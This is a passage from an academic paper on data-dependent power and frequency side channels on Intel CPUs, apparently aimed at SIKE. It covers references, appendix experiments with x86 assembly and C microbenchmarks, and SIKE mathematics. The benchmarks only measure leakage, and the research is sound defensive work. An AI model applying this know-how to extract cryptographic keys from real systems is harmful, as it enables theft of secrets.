The case for SIKE: A decade of the supersingular isogeny problem. Cryptology ePrint Archive, Report 2021/543, 2021. [21] Craig Costello and Benjamin Smith. Montgomery curves and their arithmetic - the case of large characteristic fields. J. Cryptogr. Eng., 8(3), 2018. [22] Ian Cutress. Why Intel processors draw more power than expected: TDP and Turbo explained. https://www.anandtech.com/show/1 3544/why-intel-processors-draw-more-power-than-expec ted-tdp-turbo, 2018. Accessed on Jun 7, 2022. [23] Luca De Feo. Mathematics of isogeny based cryptography. Preprint, arXiv:1711.04062 [cs.CR], 2017. [24] Luca De Feo. Exploring isogeny graphs. Habilitation thesis, Université de Versailles Saint-Quentin-en-Yvelines, 2018. [25] Luca De Feo, Nadia El Mrabet, Aymeric Genêt, Novak Kaluderovi ¯ c,´ Natacha Linard de Guertechin, Simon Pontié, and Élise Tasso. SIKE channels. Cryptology ePrint Archive, Report 2022/054, 2022. [26] Elke De Mulder, Samatha Gummalla, and Michael Hutter. Protecting RISC-V against side-channel attacks. In DAC. IEEE, 2019. [27] Hassan Eldib and Chao Wang. Synthesis of masking countermeasures against side channel attacks. In CAV, 2014. [28] Armando Faz-Hernández and Kris Kwiatkowski. Introducing CIRCL: An Advanced Cryptographic Library. Cloudflare, 2019. https://gi thub.com/cloudflare/circl. Accessed on Jun 7, 2022. [29] Armando Faz-Hernández, Julio López, Eduardo Ochoa-Jiménez, and Francisco Rodríguez-Henríquez. A faster software implementation of the supersingular isogeny Diffie-Hellman key exchange protocol. IEEE Transactions on Computers, 67(11), 2018. [30] Pierre-Alain Fouque and Frédéric Valette. The doubling attack–why upwards is better than downwards. In CHES, 2003. [31] Eiichiro Fujisaki and Tatsuaki Okamoto. Secure integration of asym- metric and symmetric encryption schemes. Journal of Cryptology, 26(1), 2013. [32] Steven D. Galbraith, Christophe Petit, Barak Shani, and Yan Bo Ti. On the security of supersingular isogeny cryptosystems. In ASIACRYPT, 2016. [33] Si Gao, Johann Großschädl, Ben Marshall, Dan Page, Thinh Pham, and Francesco Regazzoni. An instruction set extension to support software-based masking. Cryptology ePrint Archive, Report 2020/773, 2020. [34] Si Gao, Ben Marshall, Dan Page, and Elisabeth Oswald. Share-slicing: Friend or foe? TCHES, 2020. [35] Daniel Genkin, Lev Pachmanov, Itamar Pipman, Eran Tromer, and Yuval Yarom. ECDSA key extraction from mobile devices via nonin- trusive physical side channels. In CCS, 2016. [36] Daniel Genkin, Itamar Pipman, and Eran Tromer. Get your hands off my laptop: Physical side-channel key-extraction attacks on PCs. In CHES, 2014. [37] Enes Göktas, Kaveh Razavi, Georgios Portokalidis, Herbert Bos, and Cristiano Giuffrida. Speculative probing: Hacking blind in the Spectre era. In CCS, 2020. [38] Jovan D Golic and Christophe Tymen. Multiplicative masking and ´ power analysis of AES. In CHES, 2002. [39] Louis Goubin and Jacques Patarin. DES and differential power analysis the “duplication” method. In CHES, 1999. [40] Corey Gough, Ian Steiner, and Winston Saunders. Energy Efficient Servers: Blueprints for Data Center Optimization. Apress, 2015. [41] Hannes Groß, Manuel Jelinek, Stefan Mangard, Thomas Unterluggauer, and Mario Werner. Concealing secrets in embedded processors designs. In CARDIS, 2016. [42] Hannes Groß, Stefan Mangard, and Thomas Korak. Domain-oriented masking: Compact masked hardware implementations with arbitrary protection order. In TIS, 2016. 
[43] Daniel Gruss, Clémentine Maurice, Anders Fogh, Moritz Lipp, and Stefan Mangard. Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR. In CCS, 2016. [44] Dennis Hofheinz, Kathrin Hövelmanns, and Eike Kiltz. A modular analysis of the Fujisaki-Okamoto transformation. In TCC, 2017. [45] Ralf Hund, Carsten Willems, and Thorsten Holz. Practical timing side channel attacks against kernel space ASLR. In S&P, 2013. [46] Intel. Running average power limit energy reporting / cve-2020-8694 , cve-2020-8695 / intel-sa-00389. https://www.intel.com/conten t/www/us/en/developer/articles/technical/software-secu rity-guidance/advisory-guidance/running-average-power- limit-energy-reporting.html. Accessed on Jun 7, 2021. [47] Intel. Thermal design power (TDP) in Intel processors. https://www. intel.com/content/www/us/en/support/articles/000055611 /processors.html. Accessed on Jun 7, 2022. [48] Intel. Intel 64 and IA-32 Architectures Optimization Reference Manual, June 2021. [49] Intel. Intel 64 and IA-32 Architectures Software Developer’s Manual, June 2021. [50] Intel. Power management - technology overview. https://builders .intel.com/docs/networkbuilders/power-management-techn ology-overview-technology-guide.pdf, 2021. Accessed on Jun 7, 2022. [51] Yeongjin Jang, Sangho Lee, and Taesoo Kim. Breaking kernel address space layout randomization with Intel TSX. In CCS, 2016. [52] David Jao, Reza Azarderakhsh, Matthew Campagna, Craig Costello, Luca De Feo, Basil Hess, Amir Jalali, Brian Koziel, Brian LaMacchia, Patrick Longa, Michael Naehrig, Joost Renes, Vladimir Soukharev, David Urbanik, Geovandro Pereira, Koray Karabina, and Aaron Hutchinson. SIKE. Technical report, National Institute of Standards and Technology, 2020. [53] David Jao and Luca De Feo. Towards quantum-resistant cryptosystems from supersingular elliptic curve isogenies. In PQCrypto, 2011. [54] Marc Joye and Christophe Tymen. Protections against differential analysis for elliptic curve cryptography. In CHES, 2001. [55] Manuel Kalmbach, Mathias Gottschlag, Tim Schmidt, and Frank Bel- losa. TurboCC: A practical frequency-based covert channel with Intel Turbo Boost. Preprint, arXiv:2007.07046 [cs.CR], 2020. [56] Nikolaos Kavvadias, Periklis Neofotistos, Spiridon Nikolaidis, CA Kos- matopoulos, and Theodore Laopoulos. Measurements analysis of the software-related power consumption in microprocessors. IEEE Trans- actions on Instrumentation and Measurement, 53(4), 2004. [57] Colin Ian King. stress-ng. https://github.com/ColinIanKing/ stress-ng, 2022. Accessed on Jun 7, 2022. [58] Paul Kocher. Timing attacks on implementations of Diffie-Hellman, RSA, DSS, and other systems. In CRYPTO, 1996. [59] Paul Kocher, Joshua Jaffe, and Benjamin Jun. Differential power anal- ysis. In CRYPTO, 1999. [60] Yann Le Corre, Johann Großschädl, and Daniel Dinu. Micro- architectural power simulator for leakage assessment of cryptographic software on ARM Cortex-M3 processors. In COSADE, 2018. [61] Sheayun Lee, Andreas Ermedahl, Sang Lyul Min, and Naehyuck Chang. An accurate instruction-level energy consumption model for embedded RISC processors. ACM SIGPLAN Notices, 36(8), 2001. [62] Linux. aperfmperf.c. https://git.kernel.org/pub/scm/lin ux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/ cpu/aperfmperf.c. Accessed on Jun 7, 2022. [63] Moritz Lipp, Daniel Gruss, and Michael Schwarz. AMD prefetch attacks through power and time. In USENIX Security, 2022. 
[64] Moritz Lipp, Andreas Kogler, David Oswald, Michael Schwarz, Cather- ine Easdon, Claudio Canella, and Daniel Gruss. PLATYPUS: Software- based power side-channel attacks on x86. In S&P, 2021. [65] Chen Liu, Abhishek Chakraborty, Nikhil Chawla, and Neer Roggel. Frequency throttling side-channel attack. Preprint, arXiv:2206.07012 [cs.CR], 2022. [66] Patrick Longa. Post-quantum Cryptography. Microsoft, 2019. Avail- able at https://github.com/microsoft/PQCrypto-SIDH. Ac- cessed on Jun 7, 2022. [67] Stefan Mangard. A simple power-analysis (SPA) attack on implemen- tations of the AES key expansion. In ICISC, 2002. [68] Stefan Mangard, Elisabeth Oswald, and Thomas Popp. Power Analysis Attacks: Revealing the Secrets of Smart Cards, volume 31. Springer Science & Business Media, 2008. [69] Stefan Mangard, Norbert Pramstaller, and Elisabeth Oswald. Success- fully attacking masked AES hardware implementations. In CHES, 2005. [70] Heiko Mantel, Johannes Schickel, Alexandra Weber, and Friedrich Weber. How secure is green IT? the case of software-based energy side channels. In ESORICS, 2018. [71] Rita Mayer-Sommer. Smartly analyzing the simplicity and the power of simple power analysis on smartcards. In CHES, 2000. [72] David McCann, Elisabeth Oswald, and Carolyn Whitnall. Towards practical tools for side channel aware software engineering:’grey box’modelling for instruction leakages. In USENIX Security, 2017. [73] Thomas Messerges. Using second-order power analysis to attack DPA resistant software. In CHES, 2000. [74] Thomas Messerges, Ezzy Dabbish, and Robert Sloan. Investigations of power analysis attacks on smartcards. In USENIX Smartcard, 1999. [75] Thomas Messerges, Ezzy Dabbish, and Robert Sloan. Power analysis attacks of modular exponentiation in smartcards. In CHES, 1999. [76] Yan Michalevsky, Aaron Schulman, Gunaa Arumugam Veerapandian, Dan Boneh, and Gabi Nakibly. PowerSpy: Location tracking using mobile device power analysis. In USENIX Security, 2015. [77] Jeremy Morse, Steve Kerrison, and Kerstin Eder. On the limitations of analyzing worst-case dynamic energy of processing. ACM Transactions on Embedded Computing Systems (TECS), 17(3):1–22, 2018. [78] Hassan Mujtaba. [IDF15]Intel’s 6th gen Skylake unwrapped - CPU microarchitecture, Gen9 graphics core and Speed Shift hardware P- state. https://wccftech.com/idf15-intel-skylake-analysis- cpu-gpu-microarchitecture-ddr4-memory-impact/4/, 2015. Accessed on Jun 7, 2022. [79] Svetla Nikova, Christian Rechberger, and Vincent Rijmen. Threshold implementations against side-channel attacks and glitches. In ICICS, 2006. [80] Roman Novak. SPA-based adaptive chosen-ciphertext attack on RSA implementation. In PKC, 2002. [81] Kostas Papagiannopoulos and Nikita Veshchikov. Mind the gap: To- wards secure 1st-order masking in software. In COSADE, 2017. [82] Matthieu Rivain and Emmanuel Prouff. Provably secure higher-order masking of AES. In CHES, 2010. [83] Erkay Savas and Çetin Kaya Koç. Montgomery inversion. J. Cryptogr. Eng., 8(3), 2018. [84] Werner Schindler and Andreas Wiemers. Power attacks in the presence of exponent blinding. J. Cryptogr. Eng., 4(4), 2014. [85] Werner Schindler and Andreas Wiemers. Generic power attacks on RSA with CRT and exponent blinding: new results. J. Cryptogr. Eng., 7(4), 2017. [86] Kai Schramm and Christof Paar. Higher order masking of the AES. In CT-RSA, 2006. [87] Madura A Shelton, Niels Samwel, Lejla Batina, Francesco Regazzoni, Markus Wagner, and Yuval Yarom. 
Rosita: Towards automatic elimination of power-analysis leakage in ciphers. In NDSS, 2021. [88] Ankush Varma, Eric Debes, Igor Kozintsev, and Bruce Jacob. Instruction-level power dissipation in the Intel XScale embedded microprocessor. In Embedded Processors for Multimedia and Communications II, 2005. [89] Nikita Veshchikov. SILK: High level of abstraction leakage simulator for side channel analysis. In PPREW, 2014. [90] Vince Weaver. Reading RAPL energy measurements from Linux. http://web.eece.maine.edu/~vweaver/projects/rapl/. Accessed on Jun 7, 2022. [91] Rafael J. Wysocki. intel_pstate CPU performance scaling driver. https://www.kernel.org/doc/html/v4.19/admin-guide/pm/intel_pstate.html. Accessed on Jun 7, 2022. [92] Lin Yan, Yao Guo, Xiangqun Chen, and Hong Mei. A study on power side channels on mobile devices. In Internetware, 2015. [93] Qing Yang, Paolo Gasti, Gang Zhou, Aydin Farajidavar, and Kiran Balagani. On inferring browsing activity on smartphones via USB power analysis side-channel. IEEE Trans. Inf. Forensics Secur., 12(5), 2016. [94] Sung-Ming Yen, Wei-Chih Lien, SangJae Moon, and JaeCheol Ha. Power analysis by exploiting chosen message and internal collisions - vulnerability of checking mechanism for RSA-decryption. In Mycrypt, 2005. [95] Zhenkai Zhang, Sisheng Liang, Fan Yao, and Xing Gao. Red alert for power leakage: Exploiting Intel RAPL-induced side channels. In ASIACCS, 2021.

A Appendix

A.1 Leakage Model—Additional Experiments

HD in the ALU Input. In Section 4.1, we saw that increasing the number of bit transitions in the ALU output causes an increase in power consumption and a decrease in frequency. Here, we set out to understand whether the same effect occurs when the bit transitions are in the ALU input. We need a sender that offers fine-grained control over the number of transitions in the ALU input, while avoiding potential side effects such as the HW effect or bit transitions in the ALU output. We design a sender that is symmetric to the one of Figure 3a. Our sender still uses shlx and shrx instructions, as shown in Figure 13a. However, it is designed such that the output of all shlx and shrx instructions is always the same, and only their input varies as a function of COUNT. Hence, any HD effect is caused by bit transitions in the ALU input only. For example, when COUNT = 8, the source register to each shlx contains 0x000000ffffffff00 and the source register to each shrx contains 0x00ffffffff000000; alternating between the two translates to a HD of 4 × 8 in the ALU input.

Figure 14 shows the results for increasing COUNT values. We see that the power consumption grows and the frequency drops as COUNT grows, confirming that the number of bit transitions (i.e., the HD) in the ALU input directly affects power consumption and CPU frequency.

  rax = COUNT
  rbx = 0x0000FFFFFFFF0000 >> COUNT
  rcx = 0x0000FFFFFFFF0000 << COUNT
  loop:
    shlx %rax,%rbx,%rdx   // rdx = rbx << rax
    shlx %rax,%rbx,%rsi   // rsi = rbx << rax
    shrx %rax,%rcx,%rdi   // rdi = rcx >> rax
    shrx %rax,%rcx,%r8    // r8  = rcx >> rax
    shlx %rax,%rbx,%r9    // r9  = rbx << rax
    shlx %rax,%rbx,%r10   // r10 = rbx << rax
    shrx %rax,%rcx,%r11   // r11 = rcx >> rax
    shrx %rax,%rcx,%r12   // r12 = rcx >> rax
    jmp loop

(a) Variant of sender for the HD experiments.
  rax = 1
  rsp = pointer_to_memory
  rbx = ... = r15 = INPUT
  loop:
    mov %rax,(%rsp)   // store rax to memory
    mov %rax,(%rsp)   // store rax to memory
    mov %rax,(%rsp)   // store rax to memory
    mov %rax,(%rsp)   // store rax to memory
    mov %rax,(%rsp)   // store rax to memory
    mov %rax,(%rsp)   // store rax to memory
    mov %rax,(%rsp)   // store rax to memory
    mov %rax,(%rsp)   // store rax to memory
    jmp loop

(b) Sender for the HW at rest experiments.

Figure 13: Additional sets of instructions (senders) used to reverse engineer the dependency between data and power consumption / frequency on our CPUs. Different senders are designed to target different effects. Each sender can be run with variable inputs.

Figure 14: Effect of increasing COUNT in Figure 13a's sender on our i7-9700 CPU. Higher COUNT values cause higher HDs in the ALU input. As the HD increases, the mean power consumption grows and the mean steady-state frequency drops. (Panels: (a) mean frequency in GHz vs. COUNT; (b) mean power in W vs. COUNT.)

We also see that the changes in power / frequency become more significant when COUNT > 8, as a result of the non-uniform HW cost of having 1s closer to the MSB in the fixed source register rcx.

Non-uniform HW. In Section 4.2, we saw that the HW effect depends on the position of 1s in the data (i.e., it is non-uniform). We now discuss two experiments that provide additional evidence that the HW effect is non-uniform. We refer to these experiments as shift0 and shift1. Both experiments use the same sender as in Section 4.2, shown in Figure 3b. In shift1, we fix the number of consecutive 1s and measure the impact of changing the position of these consecutive 1s in the LEFT = RIGHT input, when all surrounding bits are 0s. In shift0, we do the opposite: we fix the number of consecutive 0s and measure the impact of changing the position of these consecutive 0s in the LEFT = RIGHT input, when all surrounding bits are 1s. By construction, since the HW is fixed and the sender does not introduce any HD effect, any differences in the results depend only on the position of 1s. We label different positions of the consecutive bit patterns based on their "shift offset" starting from the LSB. For example, when the number of consecutive 1s in shift1 is 32, a shift offset of 0 refers to input value 0x00000000ffffffff and a shift offset of 16 refers to input value 0x0000ffffffff0000. Similarly, when the number of consecutive 0s in shift0 is 32, a shift offset of 16 refers to input value 0xffff00000000ffff.

Figure 15: Effect of shifting consecutive 1s in the LEFT = RIGHT input to Figure 3b's sender on our i7-9700 CPU. As we shift the 1s towards the MSB, the mean power consumption grows and the mean steady-state frequency drops. (Panels: (a) mean frequency in GHz vs. shift offset; (b) mean power in W vs. shift offset; curves for 8, 16, 32, and 48 ones.)

Figure 15 shows the results for the shift1 experiment when we fix the number of 1s to 8, 16, 32, or 48. Consider the case where the number of 1s is 16. When the shift offset is between 0 and 16, we see almost no variation in the mean power / frequency: as we shift in this range, the 1s remain entirely within the low 32 bits, and we know from Figure 7 that there is little difference in the HW effect for 1s in the low 32 bits. However, when the shift offset increases from 16 to 48, the power consumption grows and the frequency drops.
This is because we start gaining 1s in the high 32 bits and approaching the MSB. This is consistent with what we saw in Figure 7, where 1s closer to the MSB have a stronger HW effect than 1s closer to the 32nd bit. The results are similar when the number of 1s is 8. When the number of 1s is 32 or 48, the HW effect increases every time the shift offset increases. This is because, in these cases, shifting means that we lose 1s in the low 32 bits and gain 1s in the high 32 bits, and we know from Figure 7 that 1s in the high 32 bits have a stronger HW effect than 1s in the low 32 bits. The HW increments in these cases are also more significant, because the delta between the HW effect of the bits we gain and the bits we lose is larger.

Figure 16: Effect of shifting consecutive 0s in the LEFT = RIGHT input to Figure 3b's sender on our i7-9700 CPU. As we shift the 0s towards the MSB, the mean power consumption drops and the mean steady-state frequency grows. (Panels: (a) mean frequency in GHz vs. shift offset; (b) mean power in W vs. shift offset; curves for 8, 16, 32, and 48 zeros.)

Figure 16 shows the results for the shift0 experiment. These results are symmetrical to the shift1 ones and can be explained by the same reasoning. In summary, the shift0 and shift1 experiments support our observation that the HW effect is non-uniform.

HW Root Cause. In Section 4.3, we saw that the HD effect and the HW effect are additive. Recall that the HD effect is due to 1 → 0 and 0 → 1 bit transitions in the data being processed. This is a well-understood effect in the literature, and can be attributed to the fact that when more bits flip during a computation, more transistors are switched in the datapath, which causes dynamic power consumption to grow [46, 68]. However, it is difficult to pinpoint the root cause of the HW effect on x86 Intel CPUs. For example, it is unclear if the HW effect occurs only when data is actively computed on, or if it is due to a data-dependent power cost of simply keeping data stored inside registers. Our sender from Figure 3b cannot distinguish between these two cases because it is designed to continuously compute on and overwrite identical data values.

Here, we design a new sender to test whether the HW effect also occurs when data values with different HWs are simply stored in registers (at rest), but not actively computed on. Our sender, shown in Figure 13b, is designed as follows. First, it sets the content of rax to 1, rsp to a memory location, and all other architectural registers to a fixed INPUT value. Then, it enters an infinite loop of stores that write the content of rax into the memory location pointed to by rsp.¹³ By construction, the store operations in the loop are always the same and independent of the value of INPUT. Changing the value of INPUT only affects the content of registers that are initialized, but not actively computed on by the sender. Any difference in power consumption due to different INPUT values would then be due to a HW effect at rest (a compilable sketch in this spirit appears below).

Figure 17 shows the results when we increase the HW of INPUT from 0 to 64. We see no differences in the mean power consumption and mean steady-state frequency as the HW grows.

Footnote 13: We use a store so that the register file is constantly being read from, in the off chance that an inactive register file could be powered down.
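As a concrete starting point for reproducing this experiment, the following is a minimal C harness in the spirit of Figure 13b's sender (it is not our exact sender; the register choice, store count, and INPUT value are illustrative). It parks a chosen INPUT value in several otherwise idle registers and then spins on INPUT-independent stores; frequency or power is meant to be sampled externally, e.g., via scaling_cur_freq or RAPL, while instances of this loop keep the cores loaded.

  #include <stdint.h>

  /* Spin on an INPUT-independent store while several registers merely *hold*
   * data of a chosen Hamming weight. Any power/frequency difference across
   * INPUT values would indicate a HW effect "at rest".                      */
  static void hw_at_rest_sender(uint64_t input) {
      uint64_t slot = 0;                        /* memory location written in the loop */
      __asm__ volatile(
          "mov %[in], %%rbx\n\t"                /* park INPUT in otherwise idle registers */
          "mov %[in], %%rcx\n\t"
          "mov %[in], %%rdx\n\t"
          "mov %[in], %%rsi\n\t"
          "mov %[in], %%rdi\n\t"
          "mov $1, %%rax\n\t"
          "1:\n\t"
          "mov %%rax, (%[mem])\n\t"             /* the work is independent of INPUT */
          "mov %%rax, (%[mem])\n\t"
          "mov %%rax, (%[mem])\n\t"
          "mov %%rax, (%[mem])\n\t"
          "jmp 1b\n\t"
          :
          : [in] "r"(input), [mem] "r"(&slot)
          : "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "memory");
  }

  int main(void) {
      hw_at_rest_sender(0x00000000FFFFFFFFULL); /* HW = 32; vary this across runs */
      return 0;                                 /* never reached: infinite sender loop */
  }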
Figure 17: Effect of increasing the HW of INPUT (at rest) in Figure 13b's sender on our i7-9700 CPU. As we increase the HW from 0 to 64, the mean power consumption and the mean steady-state frequency do not change. (Panels: (a) mean frequency in GHz vs. HW of INPUT; (b) mean power in W vs. HW of INPUT.)

This result suggests that the HW effect does not occur when simply keeping data stored inside registers.

A.2 Mathematical Preliminaries for SIKE

SIKE is an isogeny-based key encapsulation method which involves arithmetic operations on elliptic curves over finite fields. In particular, SIKE uses Montgomery elliptic curves. Its security relies on the hardness of finding a specific isogeny between two such elliptic curves. Here, we provide an overview of the details of SIKE that are relevant to our attack.¹⁴

Let p be a prime of the form 2^{e_2} 3^{e_3} − 1. SIKE works in the field F_{p^2} = F_p(i) with i^2 = −1 (mod p) and uses the supersingular elliptic curves over F_{p^2} that have (2^{e_2} 3^{e_3})^2 points. The set of points P ∈ E(F̄_p) that satisfy [n]P = O is called the n-torsion of E, denoted E[n]. The curves of interest were chosen so that the entire (2^{e_2} 3^{e_3})-torsion is already defined over F_{p^2}, and we have E[2^{e_2} 3^{e_3}] ≅ Z/(2^{e_2} 3^{e_3})Z × Z/(2^{e_2} 3^{e_3})Z; as a result, for each curve of interest, E[2^{e_2}] can be generated by linear combinations of two points P_2 and Q_2 with coordinates in F_{p^2}, and likewise E[3^{e_3}] can be generated by linear combinations of two points P_3 and Q_3 with coordinates in F_{p^2}.

An isogeny φ: E_1(F_{p^2}) → E_2(F_{p^2}) is a group homomorphism from E_1(F_{p^2}) to E_2(F_{p^2}) and a non-constant rational map defined over F_{p^2} that preserves the point at infinity O. The kernel of an isogeny is ker φ = {P ∈ E_1 : φ(P) = O}. Every finite subgroup H of a curve E(F_{p^2}) defines an isogeny φ: E → E/H, unique up to isomorphism, such that ker φ = H. The cardinality of H is also the degree of the rational map φ. Given H, Vélu's algorithm allows the rational map for the isogeny corresponding to H to be computed; the computation is tractable when |H| is small.

An ℓ-isogeny is defined as φ_ℓ: E → E/⟨P⟩, where P has exact order ℓ. The order of φ(Q) in E/⟨P⟩ is the same as the order of Q in E unless Q lies above ker φ (meaning that

Footnote 14: For more information on SIKE, we refer to the SIKE tutorial by Costello [19] and to the SIKE specification [52]. For more information on elliptic curves and isogenies, we refer to the pairings tutorial by Costello [18] and to De Feo's lecture notes [23] and habilitation thesis [24]. For more information on Montgomery ladders, we refer to Bernstein and Lange [6].

Algorithm 2: Computing and evaluating a 3^e-isogeny, simple version ([52], Appendix A)
  function 3_e_iso
  Static parameters: Integer e_3 from the public parameters
  Input: Constants (A_24^+ : A_24^-) corresponding to a curve E_{A/C}, (X_S : Z_S) where S has exact order 3^{e_3} on E_{A/C}
  Output: (A_24^+' : A_24^-') corresponding to the curve E_{A'/C'} = E/⟨S⟩
  for e = e_3 − 1 downto 0 by −1 do
    (X_T : Z_T) ← xTPL^e